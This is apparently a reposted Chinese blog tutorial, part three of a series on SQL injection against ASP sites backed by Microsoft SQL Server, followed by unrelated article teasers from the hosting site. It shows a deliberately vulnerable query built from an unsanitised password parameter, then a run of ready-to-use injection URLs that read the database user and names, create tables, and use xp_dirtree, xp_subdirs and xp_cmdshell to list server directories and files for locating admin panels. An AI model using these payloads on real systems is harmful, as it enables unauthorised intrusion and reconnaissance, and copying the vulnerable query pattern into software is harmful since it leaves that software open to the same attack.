ASP+MSSQL系列注射教程之三。暴目录及文件列表。

转载 2006年05月18日 14:51:00

 

使用的程序仍然是系列注射教程之一的漏洞程序,漏洞语句:
sql2="select * from bbsuser where username='admin' and password='"&request("password")&"'"


http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>user_name()-- 看数据库权限
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>db_name()--   当前数据库名
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)----得其它数据库名

一、暴目录的第一种方法
xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree 'c:/'
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段

http://192.168.0.9:3005/test/f.asp?password=888888' create table dirs(paths varchar(100), id int)--
http://192.168.0.9:3005/test/f.asp?password=888888' insert dirs exec master.dbo.xp_dirtree 'c:/'--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs)--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs where paths not in('winnt'))--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs where paths not in('winnt','system32'))--
这种方法发现暴目录是将所有目录包括子目录都暴出来,像winnt下有很多子目录全部暴出来,不实用,一个一个查要累死。结合下面的方法只暴目录

二、暴目录的第二种方法
必须是sa权限才可以用xp_subdirs对像
http://192.168.0.9:3005/test/f.asp?password=88'create table temp(id nvarchar(255));--
http://192.168.0.9:3005/test/f.asp?password=88'insert into temp(id) exec master.dbo.xp_subdirs 'c:/';--
http://192.168.0.9:3005/test/f.asp?password=88' and 0<>(select top 1 id from temp)--

三、
不过你们想到了没有,可以将目录树写在表里然后用NBSI暴出表值。就可以得到全部目录列表。可以用来猜到管理后台目录。然后再用
exec master.dbo.xp_dirtree 'c:/查到的目录名'就可以猜文件名了。当然,你结合exec master.dbo.xp_cmdshell 'dir 目录'也可以猜出文件名。

BTrace系列之三:BTrace实际案例分析

BTrace实际案例分析 问题表象 问题描述 1.最近有项目组的童鞋反馈,web页面频繁出现假死的状态。 2.web页面的假死出现是概率事件,且无法确定假死的引...
  • caomiao2006
  • caomiao2006
  • 2016年07月03日 16:14
  • 246

Python 获取目录下的文件列表与内容

Python 获取目录下的文件列表与内容 下面的python例子是列举用户目录下面的文件 import os import sys #info=os.getcwd() #listfile=o...
  • xlm289348
  • xlm289348
  • 2013年01月21日 17:40
  • 44002

获取115网盘文件列表

之前在做自动登录时,想着能不能通过获取动态javascript代码来获取DIV里的内容,从而获取文件列表和相关的信息,但是一番查阅资料后无果,大家如果有办法请不吝赐教,^_^。 后来在CSD...
  • hwhaocool
  • hwhaocool
  • 2015年04月22日 21:50
  • 1551

Qt快速入门系列教程目录

Qt快速入门系列教程目录 导语        该系列教程是基于QtCreator开发环境的Qt入门级教程。自2009年10月至今的两年多时间里,该系列教程逐渐完善,已经包含了Q...
  • carrie0728
  • carrie0728
  • 2016年07月14日 16:15
  • 4005

java文件目录列表(File类的list())

这一章节我们来讨论一下文件目录列表,也复习一下以前的知识点。 注意:这一章节需要一个文件夹,并在文件夹里面建立若干文件,具体怎么建立,就看自己的了。 我的文件夹结构: -ch16 |-Test...
  • fanlulu2015
  • fanlulu2015
  • 2016年01月06日 09:41
  • 2149

C语言 获取指定目录下的文件列表

//获取指定目录下的所有文件列表 char** getFileNameArray(const char *path, int* fileCount) { int count = 0; char *...
  • wangchangshuai0010
  • wangchangshuai0010
  • 2013年12月20日 21:21
  • 15019

Linux下C语言获取目录中的文件列表

转自:http://nayan115.blog.sohu.com/231443440.html 代码如下:Linux下使用GCC 编译即可 #include #include ...
  • missingu1314
  • missingu1314
  • 2013年10月09日 16:50
  • 2305

注射泵精度测试

注射泵精度测试,喇叭曲线,流速曲线
  • tcitcitci
  • tcitcitci
  • 2016年10月28日 08:52
  • 302

Java NIO系列教程(十二) Java NIO与IO

原文地址:http://tutorials.jenkov.com/java-nio/nio-vs-io.html 作者:Jakob Jenkov   译者:郭蕾    校对:方腾飞 当学习了J...
  • fw0124
  • fw0124
  • 2015年03月17日 15:22
  • 1790

js获取本地文件夹中文件列表

function init(){ var fso = new ActiveXObject("Scripting.FileSystemObject"); // 获取文件相关信息 var f1...
  • daxiang12092205
  • daxiang12092205
  • 2014年08月28日 21:58
  • 24235
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:ASP+MSSQL系列注射教程之三。暴目录及文件列表。
举报原因:
原因补充:

(最多只允许输入30个字)